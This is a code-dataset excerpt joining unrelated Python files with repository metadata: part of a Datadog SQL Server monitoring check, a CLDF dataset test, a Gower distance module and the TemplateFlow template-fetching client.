self.log.warning("Invalid ADO provider %s using default %s", provider, self.adoprovider)
provider = self.adoprovider
else:
self.log.debug("Overriding default ADO provider for %s with %s", instance['host'], provider)
return provider
def _get_access_info(self, instance, db_key, db_name=None):
''' Convenience method to extract info from instance
'''
dsn = instance.get('dsn')
host = instance.get('host')
username = instance.get('username')
password = instance.get('password')
database = instance.get(db_key) if db_name is None else db_name
driver = instance.get('driver')
if not dsn:
if not host:
host = '127.0.0.1,1433'
if not database:
database = self.DEFAULT_DATABASE
if not driver:
driver = self.DEFAULT_DRIVER
return dsn, host, username, password, database, driver
def _conn_key(self, instance, db_key, db_name=None):
''' Return a key to use for the connection cache
'''
dsn, host, username, password, database, driver = self._get_access_info(instance, db_key, db_name)
return '{}:{}:{}:{}:{}:{}'.format(dsn, host, username, password, database, driver)
def _conn_string_odbc(self, db_key, instance=None, conn_key=None, db_name=None):
''' Return a connection string to use with odbc
'''
if instance:
dsn, host, username, password, database, driver = self._get_access_info(instance, db_key, db_name)
elif conn_key:
dsn, host, username, password, database, driver = conn_key.split(":")
conn_str = ''
if dsn:
conn_str = 'DSN={};'.format(dsn)
if driver:
conn_str += 'DRIVER={};'.format(driver)
if host:
conn_str += 'Server={};'.format(host)
if database:
conn_str += 'Database={};'.format(database)
if username:
conn_str += 'UID={};'.format(username)
self.log.debug("Connection string (before password) %s", conn_str)
if password:
conn_str += 'PWD={};'.format(password)
return conn_str
def _conn_string_adodbapi(self, db_key, instance=None, conn_key=None, db_name=None):
''' Return a connection string to use with adodbapi
'''
if instance:
_, host, username, password, database, _ = self._get_access_info(instance, db_key, db_name)
elif conn_key:
_, host, username, password, database, _ = conn_key.split(":")
provider = self._get_adoprovider(instance)
conn_str = 'Provider={};Data Source={};Initial Catalog={};'.format(provider, host, database)
if username:
conn_str += 'User ID={};'.format(username)
if password:
conn_str += 'Password={};'.format(password)
if not username and not password:
conn_str += 'Integrated Security=SSPI;'
return conn_str
@contextmanager
def get_managed_cursor(self, instance, db_key, db_name=None):
cursor = self.get_cursor(instance, db_key, db_name)
yield cursor
self.close_cursor(cursor)
def get_cursor(self, instance, db_key, db_name=None):
'''
Return a cursor to execute query against the db
Cursor are cached in the self.connections dict
'''
conn_key = self._conn_key(instance, db_key, db_name)
try:
conn = self.connections[conn_key]['conn']
except KeyError:
# We catch KeyError to avoid leaking the auth info used to compose the key
# FIXME: we should find a better way to compute unique keys to map opened connections other than
# using auth info in clear text!
raise SQLConnectionError("Cannot find an opened connection for host: {}".format(instance.get('host')))
return conn.cursor()
def get_sql_type(self, instance, counter_name):
'''
Return the type of the performance counter so that we can report it to
Datadog correctly
If the sql_type is one that needs a base (PERF_RAW_LARGE_FRACTION and
PERF_AVERAGE_BULK), the name of the base counter will also be returned
'''
with self.get_managed_cursor(instance, self.DEFAULT_DB_KEY) as cursor:
cursor.execute(COUNTER_TYPE_QUERY, (counter_name,))
(sql_type,) = cursor.fetchone()
if sql_type == PERF_LARGE_RAW_BASE:
self.log.warning("Metric %s is of type Base and shouldn't be reported this way", counter_name)
base_name = None
if sql_type in [PERF_AVERAGE_BULK, PERF_RAW_LARGE_FRACTION]:
# This is an ugly hack. For certains type of metric (PERF_RAW_LARGE_FRACTION
# and PERF_AVERAGE_BULK), we need two metrics: the metrics specified and
# a base metrics to get the ratio. There is no unique schema so we generate
# the possible candidates and we look at which ones exist in the db.
candidates = (
counter_name + " base",
counter_name.replace("(ms)", "base"),
counter_name.replace("Avg ", "") + " base",
)
try:
cursor.execute(BASE_NAME_QUERY, candidates)
base_name = cursor.fetchone().counter_name.strip()
self.log.debug("Got base metric: %s for metric: %s", base_name, counter_name)
except Exception as e:
self.log.warning("Could not get counter_name of base for metric: %s", e)
return sql_type, base_name
def check(self, instance):
if self.do_check[self._conn_key(instance, self.DEFAULT_DB_KEY)]:
proc = instance.get('stored_procedure')
if proc is None:
self.do_perf_counter_check(instance)
else:
self.do_stored_procedure_check(instance, proc)
else:
self.log.debug("Skipping check")
def do_perf_counter_check(self, instance):
"""
Fetch the metrics from the sys.dm_os_performance_counters table
"""
custom_tags = instance.get('tags', [])
if custom_tags is None:
custom_tags = []
instance_key = self._conn_key(instance, self.DEFAULT_DB_KEY)
instance_by_key = self.instances_per_type_metrics[instance_key]
with self.open_managed_db_connections(instance, self.DEFAULT_DB_KEY):
# if the server was down at check __init__ key could be missing.
if instance_key not in self.instances_metrics:
self._make_metric_list_to_collect(instance, self.custom_metrics)
metrics_to_collect = self.instances_metrics[instance_key]
with self.get_managed_cursor(instance, self.DEFAULT_DB_KEY) as cursor:
simple_rows = SqlSimpleMetric.fetch_all_values(cursor, instance_by_key["SqlSimpleMetric"], self.log)
fraction_results = SqlFractionMetric.fetch_all_values(
cursor, instance_by_key["SqlFractionMetric"], self.log
)
waitstat_rows, waitstat_cols = SqlOsWaitStat.fetch_all_values(
cursor, instance_by_key["SqlOsWaitStat"], self.log
)
vfs_rows, vfs_cols = SqlIoVirtualFileStat.fetch_all_values(
cursor, instance_by_key["SqlIoVirtualFileStat"], self.log
)
clerk_rows, clerk_cols = SqlOsMemoryClerksStat.fetch_all_values(
cursor, instance_by_key["SqlOsMemoryClerksStat"], self.log # noqa: E501
)
for metric in metrics_to_collect:
try:
if type(metric) is SqlSimpleMetric:
metric.fetch_metric(cursor, simple_rows, custom_tags)
elif type(metric) is SqlFractionMetric or type(metric) is SqlIncrFractionMetric:
metric.fetch_metric(cursor, fraction_results, custom_tags)
elif type(metric) is SqlOsWaitStat:
metric.fetch_metric(cursor, waitstat_rows, waitstat_cols, custom_tags)
elif type(metric) is SqlIoVirtualFileStat:
metric.fetch_metric(cursor, vfs_rows, vfs_cols, custom_tags)
elif type(metric) is SqlOsMemoryClerksStat:
metric.fetch_metric(cursor, clerk_rows, clerk_cols, custom_tags)
except Exception as e:
self.log.warning("Could not fetch metric %s : %s", metric.datadog_name, e)
def do_stored_procedure_check(self, instance, proc):
"""
Fetch the metrics from the stored proc
"""
guardSql = instance.get('proc_only_if')
custom_tags = instance.get("tags", [])
if (guardSql and self.proc_check_guard(instance, guardSql)) or not guardSql:
self.open_db_connections(instance, self.DEFAULT_DB_KEY)
cursor = self.get_cursor(instance, self.DEFAULT_DB_KEY)
try:
self.log.debug("Calling Stored Procedure : %s", proc)
if self._get_connector(instance) == 'adodbapi':
cursor.callproc(proc)
else:
# pyodbc does not support callproc; use execute instead.
# Reference: https://github.com/mkleehammer/pyodbc/wiki/Calling-Stored-Procedures
call_proc = '{{CALL {}}}'.format(proc)
cursor.execute(call_proc)
rows = cursor.fetchall()
self.log.debug("Row count (%s) : %s", proc, cursor.rowcount)
for row in rows:
tags = [] if row.tags is None or row.tags == '' else row.tags.split(',')
tags.extend(custom_tags)
if row.type.lower() in self.proc_type_mapping:
self.proc_type_mapping[row.type](row.metric, row.value, tags)
else:
self.log.warning(
'%s is not a recognised type from procedure %s, metric %s', row.type, proc, row.metric
)
except Exception as e:
self.log.warning("Could not call procedure %s: %s", proc, e)
self.close_cursor(cursor)
self.close_db_connections(instance, self.DEFAULT_DB_KEY)
else:
self.log.info("Skipping call to %s due to only_if", proc)
def proc_check_guard(self, instance, sql):
"""
check to see if the guard SQL returns a single column containing 0 or 1
We return true if 1, else False
"""
self.open_db_connections(instance, self.PROC_GUARD_DB_KEY)
cursor = self.get_cursor(instance, self.PROC_GUARD_DB_KEY)
should_run = False
try:
cursor.execute(sql, ())
result = cursor.fetchone()
should_run = result[0] == 1
except Exception as e:
self.log.error("Failed to run proc_only_if sql %s : %s", sql, e)
self.close_cursor(cursor)
self.close_db_connections(instance, self.PROC_GUARD_DB_KEY)
return should_run
def close_cursor(self, cursor):
"""
We close the cursor explicitly b/c we had proven memory leaks
We handle any exception from closing, although according to the doc:
"in adodbapi, it is NOT an error to re-close a closed cursor"
"""
try:
cursor.close()
except Exception as e:
self.log.warning("Could not close adodbapi cursor\n%s", e)
def close_db_connections(self, instance, db_key, db_name=None):
"""
We close the db connections explicitly b/c when we don't they keep
locks on the db. This presents as issues such as the SQL Server Agent
being unable to stop.
"""
conn_key = self._conn_key(instance, db_key, db_name)
if conn_key not in self.connections:
return
try:
self.connections[conn_key]['conn'].close()
del self.connections[conn_key]
except Exception as e:
self.log.warning("Could not close adodbapi db connection\n%s", e)
@contextmanager
def open_managed_db_connections(self, instance, db_key, db_name=None):
self.open_db_connections(instance, db_key, db_name)
yield
self.close_db_connections(instance, db_key, db_name)
def open_db_connections(self, instance, db_key, db_name=None):
"""
We open the db connections explicitly, so we can ensure they are open
before we use them, and are closable, once we are finished. Open db
connections keep locks on the db, presenting issues such as the SQL
Server Agent being unable to stop.
"""
conn_key = self._conn_key(instance, db_key, db_name)
timeout = int(instance.get('command_timeout', self.DEFAULT_COMMAND_TIMEOUT))
dsn, host, username, password, database, driver = self._get_access_info(instance, db_key, db_name)
custom_tags = instance.get("tags", [])
if custom_tags is None:
custom_tags = []
service_check_tags = ['host:{}'.format(host), 'db:{}'.format(database)]
service_check_tags.extend(custom_tags)
service_check_tags = list(set(service_check_tags))
cs = instance.get('connection_string', '')
cs += ';' if cs != '' else ''
try:
if self._get_connector(instance) == 'adodbapi':
cs += self._conn_string_adodbapi(db_key, instance=instance, db_name=db_name)
# autocommit: true disables implicit transaction
rawconn = adodbapi.connect(cs, {'timeout': timeout, 'autocommit': True})
else:
cs += self._conn_string_odbc(db_key, instance=instance, db_name=db_name)
rawconn = pyodbc.connect(cs, timeout=timeout)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK, tags=service_check_tags)
if conn_key not in self.connections:
self.connections[conn_key] = {'conn': rawconn, 'timeout': timeout}
else:
try:
# explicitly trying to avoid leaks...
self.connections[conn_key]['conn'].close()
except Exception as e:
self.log.info("Could not close adodbapi db connection\n%s", e)
self.connections[conn_key]['conn'] = rawconn
except Exception as e:
cx = "{} - {}".format(host, database)
message = "Unable to connect to SQL Server for instance {}: {}".format(cx, repr(e))
password = instance.get('password')
if password is not None:
message = message.replace(password, "*" * 6)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags, message=message)
raise_from(SQLConnectionError(message), None)
class SqlServerMetric(object):
'''General class for common methods, should never be instantiated directly
'''
def __init__(self, connector, cfg_instance, base_name, report_function, column, logger):
self.connector = connector
self.cfg_instance = cfg_instance
self.datadog_name = cfg_instance['name']
self.sql_name = cfg_instance.get('counter_name', '')
self.base_name = base_name
self.report_function = report_function
self.instance = cfg_instance.get('instance_name', '')
self.object_name = cfg_instance.get('object_name', '')
self.tags = cfg_instance.get('tags', [])
self.tag_by = cfg_instance.get('tag_by', None)
self.column = column
self.instances = None
self.past_values = {}
self.log = logger
def fetch_metrics(self, cursor, tags):
raise NotImplementedError
class SqlSimpleMetric(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
placeholder = '?'
placeholders = ', '.join(placeholder for unused in counters_list)
query_base = (
'''
select counter_name, instance_name, object_name, cntr_value
from sys.dm_os_performance_counters where counter_name in (%s)
'''
% placeholders
)
logger.debug("query base: %s", query_base)
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
return rows
def fetch_metric(self, cursor, rows, tags):
tags = tags + self.tags
for counter_name_long, instance_name_long, object_name, cntr_value in rows:
counter_name = counter_name_long.strip()
instance_name = instance_name_long.strip()
object_name = object_name.strip()
if counter_name.strip() == self.sql_name:
matched = False
metric_tags = list(tags)
if (self.instance == ALL_INSTANCES and instance_name != "_Total") or (
instance_name == self.instance and (not self.object_name or object_name == self.object_name)
):
matched = True
if matched:
if self.instance == ALL_INSTANCES:
metric_tags.append('{}:{}'.format(self.tag_by, instance_name.strip()))
self.report_function(self.datadog_name, cntr_value, tags=metric_tags)
if self.instance != ALL_INSTANCES:
break
class SqlFractionMetric(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
placeholder = '?'
placeholders = ', '.join(placeholder for unused in counters_list)
query_base = VALUE_AND_BASE_QUERY % placeholders
logger.debug("query base: %s, %s", query_base, str(counters_list))
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
results = defaultdict(list)
for counter_name, cntr_type, cntr_value, instance_name, object_name in rows:
rowlist = [cntr_type, cntr_value, instance_name.strip(), object_name.strip()]
logger.debug("Adding new rowlist %s", str(rowlist))
results[counter_name.strip()].append(rowlist)
return results
def set_instances(self, cursor):
if self.instance == ALL_INSTANCES:
cursor.execute(INSTANCES_QUERY, (self.sql_name,))
self.instances = [row.instance_name for row in cursor.fetchall()]
else:
self.instances = [self.instance]
def fetch_metric(self, cursor, results, tags):
'''
Because we need to query the metrics by matching pairs, we can't query
all of them together without having to perform some matching based on
the name afterwards so instead we query instance by instance.
We cache the list of instance so that we don't have to look it up every time
'''
if self.sql_name not in results:
self.log.warning("Couldn't find %s in results", self.sql_name)
return
tags = tags + self.tags
results_list = results[self.sql_name]
done_instances = []
for ndx, row in enumerate(results_list):
ctype = row[0]
cval = row[1]
inst = row[2]
object_name = row[3]
if inst in done_instances:
continue
if (self.instance != ALL_INSTANCES and inst != self.instance) or (
self.object_name and object_name != self.object_name
):
done_instances.append(inst)
continue
# find the next row which has the same instance
cval2 = None
ctype2 = None
for second_row in results_list[: ndx + 1]:
if inst == second_row[2]:
cval2 = second_row[1]
ctype2 = second_row[0]
if cval2 is None:
self.log.warning("Couldn't find second value for %s", self.sql_name)
continue
done_instances.append(inst)
if ctype < ctype2:
value = cval
base = cval2
else:
value = cval2
base = cval
metric_tags = list(tags)
if self.instance == ALL_INSTANCES:
metric_tags.append('{}:{}'.format(self.tag_by, inst.strip()))
self.report_fraction(value, base, metric_tags)
def report_fraction(self, value, base, metric_tags):
try:
result = value / float(base)
self.report_function(self.datadog_name, result, tags=metric_tags)
except ZeroDivisionError:
self.log.debug("Base value is 0, won't report metric %s for tags %s", self.datadog_name, metric_tags)
class SqlIncrFractionMetric(SqlFractionMetric):
def report_fraction(self, value, base, metric_tags):
key = "key:" + "".join(metric_tags)
if key in self.past_values:
old_value, old_base = self.past_values[key]
diff_value = value - old_value
diff_base = base - old_base
try:
result = diff_value / float(diff_base)
self.report_function(self.datadog_name, result, tags=metric_tags)
except ZeroDivisionError:
self.log.debug("Base value is 0, won't report metric %s for tags %s", self.datadog_name, metric_tags)
self.past_values[key] = (value, base)
class SqlOsWaitStat(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
if not counters_list:
return None, None
placeholder = '?'
placeholders = ', '.join(placeholder for unused in counters_list)
query_base = '''
select * from sys.dm_os_wait_stats where wait_type in ({})
'''.format(
placeholders
)
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
columns = [i[0] for i in cursor.description]
return rows, columns
def fetch_metric(self, cursor, rows, columns, tags):
name_column_index = columns.index("wait_type")
value_column_index = columns.index(self.column)
value = None
for row in rows:
if row[name_column_index] == self.sql_name:
value = row[value_column_index]
break
if value is None:
self.log.debug("Didn't find %s %s", self.sql_name, self.column)
return
self.log.debug("Value for %s %s is %s", self.sql_name, self.column, value)
metric_name = '{}.{}'.format(self.datadog_name, self.column)
self.report_function(metric_name, value, tags=tags + self.tags)
class SqlIoVirtualFileStat(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
if not counters_list:
return None, None
query_base = "select * from sys.dm_io_virtual_file_stats(null, null)"
cursor.execute(query_base)
rows = cursor.fetchall()
columns = [i[0] for i in cursor.description]
return rows, columns
def __init__(self, connector, cfg_instance, base_name, report_function, column, logger):
super(SqlIoVirtualFileStat, self).__init__(connector, cfg_instance, base_name, report_function, column, logger)
self.dbid = self.cfg_instance.get('database_id', None)
self.fid = self.cfg_instance.get('file_id', None)
self.pvs_vals = defaultdict(lambda: None)
def fetch_metric(self, cursor, rows, columns, tags):
tags = tags + self.tags
dbid_ndx = columns.index("database_id")
fileid_ndx = columns.index("file_id")
column_ndx = columns.index(self.column)
for row in rows:
dbid = row[dbid_ndx]
fid = row[fileid_ndx]
value = row[column_ndx]
if self.dbid and self.dbid != dbid:
continue
if self.fid and self.fid != fid:
continue
if not self.pvs_vals[dbid, fid]:
self.pvs_vals[dbid, fid] = value
continue
report_value = value - self.pvs_vals[dbid, fid]
self.pvs_vals[dbid, fid] = value
metric_tags = ['database_id:{}'.format(str(dbid).strip()), 'file_id:{}'.format(str(fid).strip())]
metric_tags.extend(tags)
metric_name = '{}.{}'.format(self.datadog_name, self.column)
self.report_function(metric_name, report_value, tags=metric_tags)
class SqlOsMemoryClerksStat(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
if not counters_list:
return None, None
placeholder = '?'
placeholders = ', '.join(placeholder for _ in counters_list)
query_base = '''
select * from sys.dm_os_memory_clerks where type in ({})
'''.format(
placeholders
)
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
columns = [i[0] for i in cursor.description]
return rows, columns
def fetch_metric(self, cursor, rows, columns, tags):
tags = tags + self.tags
type_column_index = columns.index("type")
value_column_index = columns.index(self.column)
memnode_index = columns.index("memory_node_id")
for row in rows:
column_val = row[value_column_index]
node_id = row[memnode_index]
met_type = row[type_column_index]
if met_type != self.sql_name:
continue
metric_tags = ['memory_node_id:{}'.format(str(node_id))]
metric_tags.extend(tags)
metric_name = '{}.{}'.format(self.datadog_name, self.column)
self.report_function(metric_name, column_val, tags=metric_tags)
| 42.971787
| 136
| 0.612246
|
962ab1d213ce1ba006b0e224497bb9c4b3c11da7
| 450
|
py
|
Python
|
test.py
|
lexibank/huntergatherer
|
50c03c198535cfcc145a605edf3307f90639e23c
|
[
"CC-BY-4.0"
] | null | null | null |
test.py
|
lexibank/huntergatherer
|
50c03c198535cfcc145a605edf3307f90639e23c
|
[
"CC-BY-4.0"
] | 8
|
2019-04-08T20:39:40.000Z
|
2021-07-23T09:34:18.000Z
|
test.py
|
lexibank/huntergatherer
|
50c03c198535cfcc145a605edf3307f90639e23c
|
[
"CC-BY-4.0"
] | null | null | null |
def test_valid(cldf_dataset, cldf_logger):
assert cldf_dataset.validate(log=cldf_logger)
def test_forms(cldf_dataset):
assert len(list(cldf_dataset["FormTable"])) == 79893
assert any(f["Form"] == "panyi'a-t" for f in cldf_dataset["FormTable"])
def test_parameters(cldf_dataset):
assert len(list(cldf_dataset["ParameterTable"])) == 744
def test_languages(cldf_dataset):
assert len(list(cldf_dataset["LanguageTable"])) == 324
| 28.125
| 75
| 0.733333
|
265669498cc7781f8741865813c0252cc00bf905
| 4,661
|
py
|
Python
|
gower/gower_dist.py
|
singharx/gower
|
a5826342ed00bc981d7cef8604f7edfcad92f3ab
|
[
"MIT"
] | 42
|
2020-04-07T16:38:37.000Z
|
2022-03-11T16:52:16.000Z
|
gower/gower_dist.py
|
singharx/gower
|
a5826342ed00bc981d7cef8604f7edfcad92f3ab
|
[
"MIT"
] | 4
|
2020-08-30T19:20:13.000Z
|
2022-03-21T09:47:00.000Z
|
gower/gower_dist.py
|
singharx/gower
|
a5826342ed00bc981d7cef8604f7edfcad92f3ab
|
[
"MIT"
] | 10
|
2020-05-02T14:11:34.000Z
|
2022-03-20T22:22:17.000Z
|
from scipy.sparse import issparse
import numpy as np
import pandas as pd
def gower_matrix(data_x, data_y=None, weight=None, cat_features=None):
# function checks
X = data_x
if data_y is None: Y = data_x
else: Y = data_y
if not isinstance(X, np.ndarray):
if not np.array_equal(X.columns, Y.columns): raise TypeError("X and Y must have same columns!")
else:
if not X.shape[1] == Y.shape[1]: raise TypeError("X and Y must have same y-dim!")
if issparse(X) or issparse(Y): raise TypeError("Sparse matrices are not supported!")
x_n_rows, x_n_cols = X.shape
y_n_rows, y_n_cols = Y.shape
if cat_features is None:
if not isinstance(X, np.ndarray):
is_number = np.vectorize(lambda x: not np.issubdtype(x, np.number))
cat_features = is_number(X.dtypes)
else:
cat_features = np.zeros(x_n_cols, dtype=bool)
for col in range(x_n_cols):
if not np.issubdtype(type(X[0, col]), np.number):
cat_features[col]=True
else:
cat_features = np.array(cat_features)
# print(cat_features)
if not isinstance(X, np.ndarray): X = np.asarray(X)
if not isinstance(Y, np.ndarray): Y = np.asarray(Y)
Z = np.concatenate((X,Y))
x_index = range(0,x_n_rows)
y_index = range(x_n_rows,x_n_rows+y_n_rows)
Z_num = Z[:,np.logical_not(cat_features)]
num_cols = Z_num.shape[1]
num_ranges = np.zeros(num_cols)
num_max = np.zeros(num_cols)
for col in range(num_cols):
col_array = Z_num[:, col].astype(np.float32)
max = np.nanmax(col_array)
min = np.nanmin(col_array)
if np.isnan(max):
max = 0.0
if np.isnan(min):
min = 0.0
num_max[col] = max
num_ranges[col] = (1 - min / max) if (max != 0) else 0.0
# This is to normalize the numeric values between 0 and 1.
Z_num = np.divide(Z_num ,num_max,out=np.zeros_like(Z_num), where=num_max!=0)
Z_cat = Z[:,cat_features]
if weight is None:
weight = np.ones(Z.shape[1])
#print(weight)
weight_cat=weight[cat_features]
weight_num=weight[np.logical_not(cat_features)]
out = np.zeros((x_n_rows, y_n_rows), dtype=np.float32)
weight_sum = weight.sum()
X_cat = Z_cat[x_index,]
X_num = Z_num[x_index,]
Y_cat = Z_cat[y_index,]
Y_num = Z_num[y_index,]
# print(X_cat,X_num,Y_cat,Y_num)
for i in range(x_n_rows):
j_start= i
if x_n_rows != y_n_rows:
j_start = 0
# call the main function
res = gower_get(X_cat[i,:],
X_num[i,:],
Y_cat[j_start:y_n_rows,:],
Y_num[j_start:y_n_rows,:],
weight_cat,
weight_num,
weight_sum,
cat_features,
num_ranges,
num_max)
#print(res)
out[i,j_start:]=res
if x_n_rows == y_n_rows: out[i:,j_start]=res
return out
def gower_get(xi_cat,xi_num,xj_cat,xj_num,feature_weight_cat,
feature_weight_num,feature_weight_sum,categorical_features,
ranges_of_numeric,max_of_numeric ):
# categorical columns
sij_cat = np.where(xi_cat == xj_cat,np.zeros_like(xi_cat),np.ones_like(xi_cat))
sum_cat = np.multiply(feature_weight_cat,sij_cat).sum(axis=1)
# numerical columns
abs_delta=np.absolute(xi_num-xj_num)
sij_num=np.divide(abs_delta, ranges_of_numeric, out=np.zeros_like(abs_delta), where=ranges_of_numeric!=0)
sum_num = np.multiply(feature_weight_num,sij_num).sum(axis=1)
sums= np.add(sum_cat,sum_num)
sum_sij = np.divide(sums,feature_weight_sum)
return sum_sij
def smallest_indices(ary, n):
"""Returns the n largest indices from a numpy array."""
#n += 1
flat = np.nan_to_num(ary.flatten(), nan=999)
indices = np.argpartition(-flat, -n)[-n:]
indices = indices[np.argsort(flat[indices])]
#indices = np.delete(indices,0,0)
values = flat[indices]
return {'index': indices, 'values': values}
def gower_topn(data_x, data_y=None, weight=None, cat_features=None, n = 5):
if data_x.shape[0] >= 2: TypeError("Only support `data_x` of 1 row. ")
dm = gower_matrix(data_x, data_y, weight, cat_features)
return smallest_indices(np.nan_to_num(dm[0], nan=1),n)
| 33.292857
| 109
| 0.585497
|
1a867a87ab241adc3d387fd4b43ec71fc3e8b87a
| 7,325
|
py
|
Python
|
templateflow/api.py
|
rciric/templateflow-python-client
|
96b9f1f949dd3cf8843ab91d041390c6944d1da7
|
[
"Apache-2.0"
] | null | null | null |
templateflow/api.py
|
rciric/templateflow-python-client
|
96b9f1f949dd3cf8843ab91d041390c6944d1da7
|
[
"Apache-2.0"
] | null | null | null |
templateflow/api.py
|
rciric/templateflow-python-client
|
96b9f1f949dd3cf8843ab91d041390c6944d1da7
|
[
"Apache-2.0"
] | null | null | null |
"""TemplateFlow's Python Client."""
from json import loads
from pathlib import Path
import re
import sys
from .conf import TF_LAYOUT, TF_S3_ROOT, TF_USE_DATALAD, requires_layout
@requires_layout
def get(template, raise_empty=False, **kwargs):
"""
Fetch one file from one particular template.
Parameters
----------
template : str
A template identifier (e.g., ``MNI152NLin2009cAsym``).
raise_empty : bool, optional
Raise exception if no files were matched
Keyword Arguments
-----------------
resolution: int or None
Index to an specific spatial resolution of the template.
suffix : str or None
BIDS suffix
atlas : str or None
Name of a particular atlas
hemi : str or None
Hemisphere
space : str or None
Space template is mapped to
density : str or None
Surface density
desc : str or None
Description field
Examples
--------
>>> str(get('MNI152Lin', resolution=1, suffix='T1w')) # doctest: +ELLIPSIS
'.../tpl-MNI152Lin/tpl-MNI152Lin_res-01_T1w.nii.gz'
>>> str(get('MNI152Lin', resolution=2, suffix='T1w')) # doctest: +ELLIPSIS
'.../tpl-MNI152Lin/tpl-MNI152Lin_res-02_T1w.nii.gz'
>>> [str(p) for p in get(
... 'MNI152Lin', suffix='T1w')] # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
['.../tpl-MNI152Lin/tpl-MNI152Lin_res-01_T1w.nii.gz',
'.../tpl-MNI152Lin/tpl-MNI152Lin_res-02_T1w.nii.gz']
>>> str(get('fsLR', space=None, hemi='L',
... density='32k', suffix='sphere')) # doctest: +ELLIPSIS
'.../tpl-fsLR_hemi-L_den-32k_sphere.surf.gii'
>>> get('fsLR', space='madeup')
[]
>>> get('fsLR', raise_empty=True, space='madeup') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
Exception:
...
"""
out_file = [
Path(p) for p in TF_LAYOUT.get(template=template, return_type="file", **kwargs)
]
# Try DataLad first
dl_missing = [p for p in out_file if not p.is_file()]
if TF_USE_DATALAD and dl_missing:
for filepath in dl_missing:
_datalad_get(filepath)
dl_missing.remove(filepath)
# Fall-back to S3 if some files are still missing
s3_missing = [p for p in out_file if p.is_file() and p.stat().st_size == 0]
for filepath in s3_missing + dl_missing:
_s3_get(filepath)
not_fetched = [str(p) for p in out_file if not p.is_file() or p.stat().st_size == 0]
if not_fetched:
msg = "Could not fetch template files: %s." % ", ".join(not_fetched)
if dl_missing and not TF_USE_DATALAD:
msg += (
"""\
The $TEMPLATEFLOW_HOME folder %s seems to contain an initiated DataLad \
dataset, but the environment variable $TEMPLATEFLOW_USE_DATALAD is not \
set or set to one of (false, off, 0). Please set $TEMPLATEFLOW_USE_DATALAD \
on (possible values: true, on, 1)."""
% TF_LAYOUT.root
)
if s3_missing and TF_USE_DATALAD:
msg += (
"""\
The $TEMPLATEFLOW_HOME folder %s seems to contain an plain \
dataset, but the environment variable $TEMPLATEFLOW_USE_DATALAD is \
set to one of (true, on, 1). Please set $TEMPLATEFLOW_USE_DATALAD \
off (possible values: false, off, 0)."""
% TF_LAYOUT.root
)
raise RuntimeError(msg)
if not out_file and raise_empty:
raise Exception("No results found")
if len(out_file) == 1:
return out_file[0]
return out_file
@requires_layout
def templates(**kwargs):
"""
Return a list of available templates.
Keyword Arguments
-----------------
resolution: int or None
Index to an specific spatial resolution of the template.
suffix : str or None
BIDS suffix
atlas : str
Name of a particular atlas
desc : str
Description field
Examples
--------
>>> base = ['MNI152Lin', 'MNI152NLin2009cAsym', 'NKI', 'OASIS30ANTs']
>>> tpls = templates()
>>> all([t in tpls for t in base])
True
>>> templates(suffix='PD')
['MNI152Lin', 'MNI152NLin2009cAsym', 'MNI152NLin2009cSym', 'MNIInfant', 'MNIPediatricAsym']
"""
return sorted(TF_LAYOUT.get_templates(**kwargs))
@requires_layout
def get_metadata(template):
"""
Fetch one file from one template.
Parameters
----------
template : str
A template identifier (e.g., ``MNI152NLin2009cAsym``).
Examples
--------
>>> get_metadata('MNI152Lin')['Name']
'Linear ICBM Average Brain (ICBM152) Stereotaxic Registration Model'
"""
tf_home = Path(TF_LAYOUT.root)
filepath = tf_home / ("tpl-%s" % template) / "template_description.json"
# Ensure that template is installed and file is available
if not filepath.is_file():
_datalad_get(filepath)
return loads(filepath.read_text())
def get_citations(template, bibtex=False):
"""
Fetch template citations
Parameters
----------
template : :obj:`str`
A template identifier (e.g., ``MNI152NLin2009cAsym``).
bibtex : :obj:`bool`, optional
Generate citations in BibTeX format.
"""
data = get_metadata(template)
refs = data.get("ReferencesAndLinks", [])
if isinstance(refs, dict):
refs = [x for x in refs.values()]
if not bibtex:
return refs
return [_to_bibtex(ref, template, idx).rstrip() for idx, ref in enumerate(refs, 1)]
def _datalad_get(filepath):
if not filepath:
return
from datalad import api
from datalad.support.exceptions import IncompleteResultsError
try:
api.get(str(filepath))
except IncompleteResultsError as exc:
if exc.failed[0]["message"] == "path not associated with any dataset":
from .conf import TF_GITHUB_SOURCE
api.install(path=TF_LAYOUT.root, source=TF_GITHUB_SOURCE, recursive=True)
api.get(str(filepath))
else:
raise
def _s3_get(filepath):
from sys import stderr
from tqdm import tqdm
import requests
path = str(filepath.relative_to(TF_LAYOUT.root))
url = "%s/%s" % (TF_S3_ROOT, path)
print("Downloading %s" % url, file=stderr)
# Streaming, so we can iterate over the response.
r = requests.get(url, stream=True)
# Total size in bytes.
total_size = int(r.headers.get("content-length", 0))
block_size = 1024
wrote = 0
if not filepath.is_file():
filepath.unlink()
with filepath.open("wb") as f:
with tqdm(total=total_size, unit="B", unit_scale=True) as t:
for data in r.iter_content(block_size):
wrote = wrote + len(data)
f.write(data)
t.update(len(data))
if total_size != 0 and wrote != total_size:
raise RuntimeError("ERROR, something went wrong")
def _to_bibtex(doi, template, idx):
if "doi.org" not in doi:
return doi
# Is a DOI URL
import requests
response = requests.post(
doi,
headers={"Accept": "application/x-bibtex; charset=utf-8"}
)
if not response.ok:
print(
f"Failed to convert DOI <{doi}> to bibtex, returning URL.",
file=sys.stderr,
)
return doi
return response.text
| 28.065134
| 95
| 0.61884
|
8c5860b3a053d48c8b9628cb23c6108ed34ed02d
| 40,411
|
py
|
Python
|
venv/lib/python3.8/site-packages/azure/mgmt/resource/policy/v2020_09_01/models/_models_py3.py
|
amcclead7336/Enterprise_Data_Science_Final
|
ccdc0aa08d4726bf82d71c11a1cc0c63eb301a28
|
[
"Unlicense",
"MIT"
] | null | null | null |
